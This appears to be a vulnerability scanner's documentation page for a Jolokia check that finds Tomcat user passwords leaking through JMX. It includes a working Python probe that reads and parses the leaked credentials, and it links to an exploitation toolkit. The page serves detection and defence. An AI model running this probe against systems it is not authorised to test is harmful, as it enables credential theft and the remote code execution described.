Access Control: Jolokia \<= 1.7.1 Information Leakage¶
Identifier:
jolokia_tomcat_creds_leak
Scanner(s) Support¶
| GraphQL Scanner | REST Scanner | WebApp Scanner | ASM Scanner |
|---|---|---|---|
Description¶
Jolokia \<= 1.7.1 exposes JMX MBeans over HTTP, and an unauthenticated or weakly protected Jolokia endpoint lets a remote client read attributes that Tomcat registers in JMX. In particular, the user entries of Tomcat's `UserDatabase` realm are registered as `Users:type=User,username=*,database=UserDatabase` MBeans whose `password` attribute returns the credential as stored in `tomcat-users.xml` (clear text unless a digesting credential handler is configured). An attacker who recovers an account holding the `manager-gui` or `manager-script` role can deploy an arbitrary WAR through the Tomcat Manager application and obtain remote code execution.
How we test: We send Jolokia `read` requests for the Tomcat user MBeans (and the other information-disclosure endpoints covered in the references) and parse the JSON responses. A response with `status` 200 that contains a non-empty `password` attribute for any matching MBean marks the target as leaking Tomcat credentials that could be used for remote code execution.
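The following is an added example of the check described above; it is not the scanner's own code or the referenced toolkit. It assumes Jolokia is mounted at `/jolokia` and that the target Tomcat registers its users as `Users:type=User,username="<name>",database=UserDatabase` MBeans with a `password` attribute. The sample responses are constructed here for illustration.

```python
"""Detect Tomcat credential leakage through Jolokia's JMX-over-HTTP read API.

Assumptions (hypothetical, not taken from the scanner): Jolokia answers at
<base_url>/jolokia and Tomcat exposes its UserDatabase users as
Users:type=User,username="<name>",database=UserDatabase MBeans.
"""
import json
import re
import urllib.request
from typing import Dict, List, Tuple

# A wildcard ObjectName makes Jolokia answer with one entry per matching MBean.
TOMCAT_USER_MBEAN_PATTERN = "Users:type=User,username=*,database=UserDatabase"
LEAKED_ATTRIBUTE = "password"


def build_read_request(mbean: str = TOMCAT_USER_MBEAN_PATTERN,
                       attribute: str = LEAKED_ATTRIBUTE) -> dict:
    """JSON body of a Jolokia POST 'read' request."""
    return {"type": "read", "mbean": mbean, "attribute": attribute}


def build_read_url(base_url: str, mbean: str = TOMCAT_USER_MBEAN_PATTERN,
                   attribute: str = LEAKED_ATTRIBUTE) -> str:
    """Equivalent GET form: /jolokia/read/<mbean>/<attribute>.
    Jolokia's path escaping writes '/' as '!/' and '!' as '!!' inside a segment."""
    def esc(segment: str) -> str:
        return segment.replace("!", "!!").replace("/", "!/")
    return f"{base_url.rstrip('/')}/jolokia/read/{esc(mbean)}/{esc(attribute)}"


def parse_object_name(object_name: str) -> Dict[str, str]:
    """Split 'domain:key=value,...' into its key properties; quoted values are unquoted."""
    _, _, props = object_name.partition(":")
    out: Dict[str, str] = {}
    for m in re.finditer(r'([^=,]+)=("(?:[^"\\]|\\.)*"|[^,]*)', props):
        key, value = m.group(1).strip(), m.group(2)
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        out[key] = value
    return out


def extract_credentials(response: dict) -> List[Tuple[str, str]]:
    """(username, password) pairs leaked by one Jolokia read response.

    Jolokia reports errors in-band: the HTTP status is normally 200 and the
    JSON 'status' field carries the real outcome (e.g. 404 when no MBean
    matches, 403 when an access policy denies the read), so only a JSON
    status of 200 with a dict value is treated as a leak.
    """
    if response.get("status") != 200 or not isinstance(response.get("value"), dict):
        return []
    found: List[Tuple[str, str]] = []
    for name, attrs in response["value"].items():
        if not isinstance(attrs, dict):
            continue
        user = parse_object_name(name).get("username")
        password = attrs.get(LEAKED_ATTRIBUTE)
        if user and isinstance(password, str) and password:
            found.append((user, password))
    return sorted(found)


def probe(base_url: str, timeout: float = 5.0) -> List[Tuple[str, str]]:
    """Live check (needs network): POST the read request and parse the answer."""
    body = json.dumps(build_read_request()).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/jolokia", data=body, method="POST",
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_credentials(json.load(resp))


# Constructed sample answers (not captured from a real host).
SAMPLE_LEAK = {
    "request": build_read_request(),
    "value": {
        'Users:database=UserDatabase,type=User,username="tomcat"': {"password": "s3cr3t"},
        'Users:database=UserDatabase,type=User,username="role1"': {"password": "tomcat"},
    },
    "timestamp": 1700000000,
    "status": 200,
}
SAMPLE_DENIED = {"request": build_read_request(), "status": 403,
                 "error_type": "java.lang.Exception", "error": "Access denied"}

if __name__ == "__main__":
    print("GET form:", build_read_url("http://target:8080"))
    print("leaked:", extract_credentials(SAMPLE_LEAK))
    print("denied:", extract_credentials(SAMPLE_DENIED))
```

`extract_credentials` deliberately keys on the JSON `status` rather than the HTTP status code, because a Jolokia agent in its default configuration returns HTTP 200 for denied or unmatched reads and signals the error only in the body; a check that relies on the transport status would misreport a properly restricted agent as vulnerable.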
Reference:
- https://github.com/laluka/jolokia-exploitation-toolkit/blob/main/exploits/info-leak-tomcat-creds.py
- https://therealcoiffeur.github.io/c11011
Configuration¶
Example¶
Example configuration:
Reference¶
skip¶
Type : boolean
Skip the test if true.